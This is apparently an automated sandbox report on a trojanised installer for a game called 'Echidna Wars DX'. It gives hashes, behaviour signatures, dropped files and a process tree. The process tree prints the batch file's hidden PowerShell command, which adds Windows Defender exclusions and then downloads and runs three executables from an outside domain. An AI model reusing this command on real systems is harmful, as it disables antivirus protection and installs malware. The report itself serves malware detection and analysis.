Analysis

  • max time kernel
    64s
  • max time network
    77s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    22/02/2024, 20:18

General

  • Target

    Setup.exe

  • Size

    43.4MB

  • MD5

    308090e687a5e248d6aa4a65a5db85a6

  • SHA1

    ef668821cca3ed41f1212a35ce51b942f4805850

  • SHA256

    0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29

  • SHA512

    7bb70fb7c8cd6a136d3870f4797a65bd67c37cf25eabd413971beda0af2e6721a0d5893ce05de67d5a5f720785ddac36c78a80dc8b38fef486963b74937edb3b

  • SSDEEP

    786432:FAjeV1AyC0U9MLgeO3lPsagQYUQ4xo8vo4mMnmOZUQA2dhfTKBGG+U8ON9wB:w0kp9K7O3lPBgQHjPn1UsdBTKX+U8ONE

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4568
        • C:\Windows\SysWOW64\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:4456
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4600
    • C:\Echidna Wars DX\Game.exe
      "C:\Echidna Wars DX\Game.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      PID:4500
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 772
        2⤵
        • Program crash
        PID:2844
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x2f4
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2840

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Echidna Wars DX\Game.exe

            Filesize

            6.9MB

            MD5

            7de3741fb79dcfa8df54a4daa90c8692

            SHA1

            8003f910997a50719d55ff098f42a23d13598b08

            SHA256

            86b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b

            SHA512

            31f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c

          • C:\Echidna Wars DX\Game.exe

            Filesize

            8.7MB

            MD5

            4e26e69b1622efa982a86cbe2edd5801

            SHA1

            8d75b18942f4ab79e29457d12d47cb7bb8763612

            SHA256

            4251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472

            SHA512

            2f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7

          • C:\Echidna Wars DX\Game.exe

            Filesize

            28.3MB

            MD5

            5769be658b2478d3d437c152adec05cf

            SHA1

            9794744bd45a038641f219ecefd31fa2e239ebbd

            SHA256

            4df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e

            SHA512

            8491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e

          • C:\Echidna Wars DX\config.bat

            Filesize

            559B

            MD5

            62f9201f9ed75ebef04946bcdf72d95a

            SHA1

            5779fad609e0c77363e6436230954243c29c9205

            SHA256

            f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847

            SHA512

            ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806

          • C:\Echidna Wars DX\hspda.dll

            Filesize

            57KB

            MD5

            88735cdf603d77cceef556215e43a45f

            SHA1

            47a4d364015a3f17143978b32aeb35220c54cb0a

            SHA256

            0ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212

            SHA512

            06995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71

          • C:\Echidna Wars DX\ovplay.dll

            Filesize

            131KB

            MD5

            def47290ed52d7ce0a2e65e8ffac95a2

            SHA1

            0edc4bb840d995a5d80f1cd15026e655c817a6ce

            SHA256

            558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc

            SHA512

            469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjmxpfe2.ck4.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp

            Filesize

            3.0MB

            MD5

            9665ccc8017eab35c9bea56ab727692a

            SHA1

            177a4d25e994e3a5e792360ce1ef48a25c9600e3

            SHA256

            dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c

            SHA512

            df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5

          • \Echidna Wars DX\hmm.dll

            Filesize

            608KB

            MD5

            401a237f4e02457713382b2413a4800c

            SHA1

            fcddfc03d93011efb0e0910c456aa47f2e632057

            SHA256

            5eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565

            SHA512

            443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61

          • \Echidna Wars DX\hspogg.dll

            Filesize

            236KB

            MD5

            8c44de023765b683fce13c7d17a00add

            SHA1

            b5256452df6f534057271a8cd1df817ce3a5bbe7

            SHA256

            02859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8

            SHA512

            ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2

          • memory/3992-76-0x0000000000400000-0x00000000004DB000-memory.dmp

            Filesize

            876KB

          • memory/3992-0-0x0000000000400000-0x00000000004DB000-memory.dmp

            Filesize

            876KB

          • memory/3992-12-0x0000000000400000-0x00000000004DB000-memory.dmp

            Filesize

            876KB

          • memory/4100-75-0x0000000000400000-0x0000000000717000-memory.dmp

            Filesize

            3.1MB

          • memory/4100-15-0x0000000000400000-0x0000000000717000-memory.dmp

            Filesize

            3.1MB

          • memory/4100-5-0x00000000009B0000-0x00000000009B1000-memory.dmp

            Filesize

            4KB

          • memory/4500-166-0x0000000000630000-0x0000000000642000-memory.dmp

            Filesize

            72KB

          • memory/4500-170-0x0000000000650000-0x000000000068C000-memory.dmp

            Filesize

            240KB

          • memory/4500-469-0x0000000010100000-0x0000000010126000-memory.dmp

            Filesize

            152KB

          • memory/4500-238-0x0000000010100000-0x0000000010126000-memory.dmp

            Filesize

            152KB

          • memory/4600-73-0x0000000007770000-0x0000000007D98000-memory.dmp

            Filesize

            6.2MB

          • memory/4600-71-0x0000000007130000-0x0000000007140000-memory.dmp

            Filesize

            64KB

          • memory/4600-103-0x0000000009450000-0x0000000009483000-memory.dmp

            Filesize

            204KB

          • memory/4600-104-0x00000000742C0000-0x000000007430B000-memory.dmp

            Filesize

            300KB

          • memory/4600-105-0x0000000009490000-0x00000000094AE000-memory.dmp

            Filesize

            120KB

          • memory/4600-110-0x00000000094B0000-0x0000000009555000-memory.dmp

            Filesize

            660KB

          • memory/4600-111-0x0000000007130000-0x0000000007140000-memory.dmp

            Filesize

            64KB

          • memory/4600-112-0x00000000099C0000-0x0000000009A54000-memory.dmp

            Filesize

            592KB

          • memory/4600-78-0x0000000007580000-0x00000000075E6000-memory.dmp

            Filesize

            408KB

          • memory/4600-79-0x0000000007E70000-0x0000000007ED6000-memory.dmp

            Filesize

            408KB

          • memory/4600-77-0x00000000073E0000-0x0000000007402000-memory.dmp

            Filesize

            136KB

          • memory/4600-83-0x00000000071A0000-0x00000000071BC000-memory.dmp

            Filesize

            112KB

          • memory/4600-72-0x0000000004A50000-0x0000000004A86000-memory.dmp

            Filesize

            216KB

          • memory/4600-102-0x000000007F470000-0x000000007F480000-memory.dmp

            Filesize

            64KB

          • memory/4600-80-0x0000000007EE0000-0x0000000008230000-memory.dmp

            Filesize

            3.3MB

          • memory/4600-70-0x00000000727A0000-0x0000000072E8E000-memory.dmp

            Filesize

            6.9MB

          • memory/4600-85-0x00000000085A0000-0x0000000008616000-memory.dmp

            Filesize

            472KB

          • memory/4600-330-0x00000000098C0000-0x00000000098DA000-memory.dmp

            Filesize

            104KB

          • memory/4600-335-0x00000000098B0000-0x00000000098B8000-memory.dmp

            Filesize

            32KB

          • memory/4600-354-0x0000000009920000-0x000000000993A000-memory.dmp

            Filesize

            104KB

          • memory/4600-355-0x0000000009970000-0x0000000009992000-memory.dmp

            Filesize

            136KB

          • memory/4600-356-0x000000000A060000-0x000000000A55E000-memory.dmp

            Filesize

            5.0MB

          • memory/4600-361-0x000000000ABE0000-0x000000000B258000-memory.dmp

            Filesize

            6.5MB

          • memory/4600-464-0x00000000727A0000-0x0000000072E8E000-memory.dmp

            Filesize

            6.9MB

          • memory/4600-84-0x0000000008720000-0x000000000876B000-memory.dmp

            Filesize

            300KB